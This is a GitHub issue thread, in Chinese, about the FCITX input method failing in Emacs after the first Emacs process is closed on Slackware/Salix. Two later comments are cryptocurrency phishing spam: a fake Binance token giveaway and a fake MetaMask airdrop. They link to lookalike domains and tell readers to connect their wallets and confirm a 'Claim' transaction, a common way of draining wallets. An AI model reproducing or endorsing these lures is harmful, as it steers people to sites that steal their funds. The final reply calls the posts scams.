### ISSUE TITLE
嘿, 问你一个有关于 FCITX 和 Emacs 的问题, 谢谢.

### ISSUE THREAD

**Issue by zw963** [cmal/.emacs.d#1]
有关问题的描述, 我刚刚发到这里了.

http://forum.salixos.org/viewtopic.php?f=16&t=6123

你可以帮到我么?

**Comment by cmal** [comment]
不好意思，打不开，可能你的网址被墙了 发自邮箱大师 在2014年09月06日 19:44，Billy写道： 有关问题的描述, 我刚刚发到这里了. http://forum.salixos.org/viewtopic.php?f=16&t=6123 你可以帮到我么? — Reply to this email directly or view it on GitHub.

**Comment by zw963** [comment]
不好意思, 最近有事儿, 现在才回复.

是这样的, 我用 LInux 以来, 一直使用 Slackware, 最近换做 Salix, 也是一个基于 Slackware 的修改版,
我不确定这个问题是不是仅在这两个发布版下才存在, 具体描述是: 我使用基于 X 的 Emacs,
当系统启动后, 启动第一个 Emacs 进程时, 是可以激活输入法的(我试过 FCITX, SLIM 等),
但是一旦退出这个进程, 再次启动, 输入法就无效了, 原先的输入法快捷键, 在 Emacs 中激活
了自己的快捷键, 仿佛输入法失去了焦点, 但是在其他的程序, 或 Terminal 下都工作的很好.

唯一的解决办法就是退出 X (或者 kill 掉 X), 重新 login, 之前打开的所有东西, 又得全部重新打开,
这让我很崩溃.

下面是一些具体的设定:
1. 我通过 .xprofile 或 .bashrc 启动 Emacs, 我没有试过通过系统 daemon 启动, 因为有大量的
环境变量, Emacs 中需要使用. 我不确定是不是这个问题.
2. 我通常使用 daemon, 仅仅启动一个 emacs process, 这不是大问题, 不过最近换到了 mate,
很崩溃, 即使一个进程, 也会常常莫名其妙的失去焦点.

我想知道你是怎么处理输入法问题的? 是否有遇到类似情况?
有可能是哪方面原因造成的? 希望你可以给我一些提示, 谢谢!

**Comment by cmal** [comment]
你好，我用的也是slackware,但我从来不关emacs，所以没遇到这种问题，你的问题是fcitx在emacsclient关闭之后，再次开启ec会不能激活吗？我用过一段fcitx但由于bug多和不适应所以改用eim了，平常还够用，如果输入量特别大我选择在win下编辑，git同步。抱歉不能帮到你

发自我的 iPhone

**Comment by fede-s** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by synchrovision** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @theowlsden, @justcharlzG, @abbotto, @renrenshuai, @hbogit, @rsakib15, @feccruz

**Comment by zw963** [comment]
现在 github 上到处都是骗子链接.
